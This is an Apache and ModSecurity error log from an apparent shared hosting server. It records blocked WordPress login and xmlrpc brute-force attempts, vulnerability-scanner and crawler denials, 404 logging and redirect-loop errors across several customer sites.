[Tue May 26 18:34:55.342308 2026] [core:error] [pid 1007701:tid 1007895] [client 161.35.138.197:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:34:55.342328 2026] [core:error] [pid 1007701:tid 1007895] [client 161.35.138.197:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:34:55.366654 2026] [security2:error] [pid 998632:tid 998776] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWad61OTU2dW0MS1EnRBgAAd3U"]
[Tue May 26 18:34:55.366820 2026] [security2:error] [pid 998632:tid 998916] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWad61OTU2dW0MS1EnRBgAAd3U"]
[Tue May 26 18:34:56.393146 2026] [security2:error] [pid 1007701:tid 1007712] [remote 216.73.216.30:38126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWaeA05qHzKMxj0enGkLQAA_Qo"]
[Tue May 26 18:34:57.589038 2026] [core:error] [pid 1007701:tid 1007949] [client 161.35.138.197:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://cpcalendars.haddingtonwines.com/
[Tue May 26 18:34:57.589061 2026] [core:error] [pid 1007701:tid 1007949] [client 161.35.138.197:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://cpcalendars.haddingtonwines.com/
[Tue May 26 18:34:58.206978 2026] [security2:error] [pid 998632:tid 998901] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaeK1OTU2dW0MS1EnRFAAAAGg"]
[Tue May 26 18:34:58.310039 2026] [security2:error] [pid 1007701:tid 1007790] [remote 103.95.119.103:43132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWaeg05qHzKMxj0enGkTgAAyFg"]
[Tue May 26 18:35:00.747063 2026] [security2:error] [pid 1007701:tid 1007875] [client 124.43.5.103:17843] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWafA05qHzKMxj0enGkZwAAALE"]
[Tue May 26 18:35:00.747218 2026] [security2:error] [pid 1007701:tid 1007875] [client 124.43.5.103:17843] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWafA05qHzKMxj0enGkZwAAALE"]
[Tue May 26 18:35:01.134472 2026] [security2:error] [pid 1007701:tid 1007749] [remote 216.73.216.30:38126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWafQ05qHzKMxj0enGkbAAA9C8"]
[Tue May 26 18:35:01.224663 2026] [security2:error] [pid 1007701:tid 1007888] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaew05qHzKMxj0enGkWAAAAL4"]
[Tue May 26 18:35:01.417704 2026] [autoindex:error] [pid 998632:tid 998871] [client 159.203.31.137:58522] AH01276: Cannot serve directory /home1/midrie34/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:35:03.139596 2026] [security2:error] [pid 1007701:tid 1007727] [remote 103.95.119.103:43132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWafw05qHzKMxj0enGkhgAAuxk"], referer: https://anujtradingco.com/wp-login.php
[Tue May 26 18:35:03.489473 2026] [security2:error] [pid 1007701:tid 1007949] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWafQ05qHzKMxj0enGkcgAAAPs"]
[Tue May 26 18:35:04.246953 2026] [security2:error] [pid 1007701:tid 1007887] [client 85.208.96.209:35778] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahWagA05qHzKMxj0enGkkQAAAL0"]
[Tue May 26 18:35:04.247078 2026] [security2:error] [pid 1007701:tid 1007887] [client 85.208.96.209:35778] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahWagA05qHzKMxj0enGkkQAAAL0"]
[Tue May 26 18:35:05.690221 2026] [security2:error] [pid 998632:tid 998823] [client 202.76.171.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaf61OTU2dW0MS1EnRNgAAAB8"]
[Tue May 26 18:35:05.796372 2026] [security2:error] [pid 998632:tid 998772] [remote 54.38.29.86:45356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWaga1OTU2dW0MS1EnRRQAAP3E"]
[Tue May 26 18:35:06.320144 2026] [security2:error] [pid 1007701:tid 1007747] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWagg05qHzKMxj0enGkqQABAS0"]
[Tue May 26 18:35:06.320336 2026] [security2:error] [pid 1007701:tid 1007955] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWagg05qHzKMxj0enGkqQABAS0"]
[Tue May 26 18:35:06.362251 2026] [security2:error] [pid 998632:tid 998685] [remote 173.212.245.56:51862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWagq1OTU2dW0MS1EnRSgAAPB0"]
[Tue May 26 18:35:06.405879 2026] [security2:error] [pid 1007701:tid 1007781] [remote 216.73.216.30:7390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWagg05qHzKMxj0enGkqgAA8k8"]
[Tue May 26 18:35:06.460850 2026] [security2:error] [pid 1007701:tid 1007858] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWagA05qHzKMxj0enGklQAAAKA"]
[Tue May 26 18:35:09.015648 2026] [security2:error] [pid 998632:tid 998897] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWag61OTU2dW0MS1EnRTgAAAGQ"]
[Tue May 26 18:35:09.746759 2026] [security2:error] [pid 998632:tid 998887] [client 1.54.215.65:3319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.215.54.1.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mahehealthcare.com"] [uri "/xmlrpc.php"] [unique_id "ahWaha1OTU2dW0MS1EnRWwAAAFo"]
[Tue May 26 18:35:09.746977 2026] [security2:error] [pid 998632:tid 998887] [client 1.54.215.65:3319] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "mahehealthcare.com"] [uri "/xmlrpc.php"] [unique_id "ahWaha1OTU2dW0MS1EnRWwAAAFo"]
[Tue May 26 18:35:11.616965 2026] [security2:error] [pid 1007701:tid 1007880] [client 124.43.5.103:55600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWahw05qHzKMxj0enGkzAAAALY"]
[Tue May 26 18:35:11.617169 2026] [security2:error] [pid 1007701:tid 1007880] [client 124.43.5.103:55600] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWahw05qHzKMxj0enGkzAAAALY"]
[Tue May 26 18:35:12.458391 2026] [security2:error] [pid 1007701:tid 1007938] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWahg05qHzKMxj0enGkxwAAAPA"]
[Tue May 26 18:35:14.642260 2026] [security2:error] [pid 998632:tid 998862] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaiK1OTU2dW0MS1EnRbwAAAEQ"]
[Tue May 26 18:35:16.790075 2026] [security2:error] [pid 1007701:tid 1007826] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWajA05qHzKMxj0enGk_wAAhnw"]
[Tue May 26 18:35:16.790825 2026] [security2:error] [pid 1007701:tid 1007832] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWajA05qHzKMxj0enGk_wAAhnw"]
[Tue May 26 18:35:16.809367 2026] [security2:error] [pid 1007701:tid 1007817] [remote 79.116.52.1:35142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.52.116.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWajA05qHzKMxj0enGk_gAA4XM"]
[Tue May 26 18:35:21.518983 2026] [security2:error] [pid 1007701:tid 1007958] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWajg05qHzKMxj0enGlEgAAAQQ"]
[Tue May 26 18:35:22.087185 2026] [security2:error] [pid 1007701:tid 1007870] [client 124.43.5.103:55882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWakg05qHzKMxj0enGlTAAAAKw"]
[Tue May 26 18:35:22.087321 2026] [security2:error] [pid 1007701:tid 1007870] [client 124.43.5.103:55882] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWakg05qHzKMxj0enGlTAAAAKw"]
[Tue May 26 18:35:22.277402 2026] [security2:error] [pid 1007701:tid 1007858] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWajg05qHzKMxj0enGlGgAAAKA"]
[Tue May 26 18:35:24.478190 2026] [security2:error] [pid 1007701:tid 1007765] [remote 222.165.190.235:59394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWalA05qHzKMxj0enGlYAAAoT8"]
[Tue May 26 18:35:24.958452 2026] [security2:error] [pid 1007701:tid 1007766] [remote 222.165.190.235:59394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWalA05qHzKMxj0enGlZAAAhUA"], referer: https://preetishah.com/wp-login.php
[Tue May 26 18:35:25.310354 2026] [security2:error] [pid 1007701:tid 1007878] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWakQ05qHzKMxj0enGlRQAAALQ"]
[Tue May 26 18:35:26.471176 2026] [security2:error] [pid 1007701:tid 1007804] [remote 216.73.216.30:61151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWalg05qHzKMxj0enGlbgAAnGY"]
[Tue May 26 18:35:26.672785 2026] [security2:error] [pid 998632:tid 998770] [remote 154.26.132.116:56518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.132.26.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWalq1OTU2dW0MS1EnRpwAABG8"]
[Tue May 26 18:35:27.507420 2026] [security2:error] [pid 998632:tid 998664] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWal61OTU2dW0MS1EnRqgAACAw"]
[Tue May 26 18:35:27.507572 2026] [security2:error] [pid 998632:tid 998799] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWal61OTU2dW0MS1EnRqgAACAw"]
[Tue May 26 18:35:27.715095 2026] [security2:error] [pid 1007701:tid 1007806] [remote 78.142.18.172:45044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWalw05qHzKMxj0enGlewAAx2g"]
[Tue May 26 18:35:28.051082 2026] [security2:error] [pid 1007701:tid 1007714] [remote 78.142.18.172:45044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWalw05qHzKMxj0enGlgwAAyww"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:35:28.308659 2026] [security2:error] [pid 998632:tid 998651] [remote 154.26.132.116:56518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.132.26.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWamK1OTU2dW0MS1EnRrgAAEgA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:35:28.907111 2026] [security2:error] [pid 1007701:tid 1007909] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWalQ05qHzKMxj0enGlaAAAANM"]
[Tue May 26 18:35:29.164066 2026] [security2:error] [pid 998632:tid 998900] [client 162.212.170.230:12151] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWamK1OTU2dW0MS1EnRrQAAAGc"], referer: https://www.cagmedya.com/kahramanmaras-web-tasarim/
[Tue May 26 18:35:29.303619 2026] [security2:error] [pid 1007701:tid 1007851] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWalg05qHzKMxj0enGldQAAAJk"]
[Tue May 26 18:35:30.069752 2026] [security2:error] [pid 1007701:tid 1007719] [remote 31.24.44.107:42022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWamQ05qHzKMxj0enGllwAAhhE"]
[Tue May 26 18:35:31.473122 2026] [security2:error] [pid 1007701:tid 1007717] [remote 216.73.216.30:61151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWamw05qHzKMxj0enGlqQAA5g8"]
[Tue May 26 18:35:31.790928 2026] [security2:error] [pid 998632:tid 998716] [remote 92.205.188.156:38538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWam61OTU2dW0MS1EnRtQAAFDw"]
[Tue May 26 18:35:32.442811 2026] [security2:error] [pid 1007701:tid 1007953] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWamQ05qHzKMxj0enGlkwAAAP8"]
[Tue May 26 18:35:32.828123 2026] [security2:error] [pid 998632:tid 998854] [client 124.43.5.103:56164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWanK1OTU2dW0MS1EnRugAAADw"]
[Tue May 26 18:35:32.828240 2026] [security2:error] [pid 998632:tid 998854] [client 124.43.5.103:56164] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWanK1OTU2dW0MS1EnRugAAADw"]
[Tue May 26 18:35:33.179436 2026] [security2:error] [pid 998632:tid 998817] [client 49.43.216.238:58388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.216.43.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bramas.in"] [uri "/xmlrpc.php"] [unique_id "ahWanK1OTU2dW0MS1EnRuQAAABo"]
[Tue May 26 18:35:33.179589 2026] [security2:error] [pid 998632:tid 998817] [client 49.43.216.238:58388] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bramas.in"] [uri "/xmlrpc.php"] [unique_id "ahWanK1OTU2dW0MS1EnRuQAAABo"]
[Tue May 26 18:35:33.219132 2026] [security2:error] [pid 1007701:tid 1007837] [client 113.187.195.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWamQ05qHzKMxj0enGllgAAAIs"]
[Tue May 26 18:35:34.327795 2026] [security2:error] [pid 998632:tid 998708] [remote 92.205.188.156:38538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWanq1OTU2dW0MS1EnRwQAAMTQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:35:34.345730 2026] [security2:error] [pid 1007701:tid 1007810] [remote 148.66.130.53:33274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.130.66.148.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWang05qHzKMxj0enGlywAAl2w"]
[Tue May 26 18:35:35.301831 2026] [security2:error] [pid 1007701:tid 1007894] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWamw05qHzKMxj0enGlrwAAAMQ"]
[Tue May 26 18:35:36.725827 2026] [security2:error] [pid 998632:tid 998714] [remote 216.73.216.30:28823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWaoK1OTU2dW0MS1EnRxwAAIDo"]
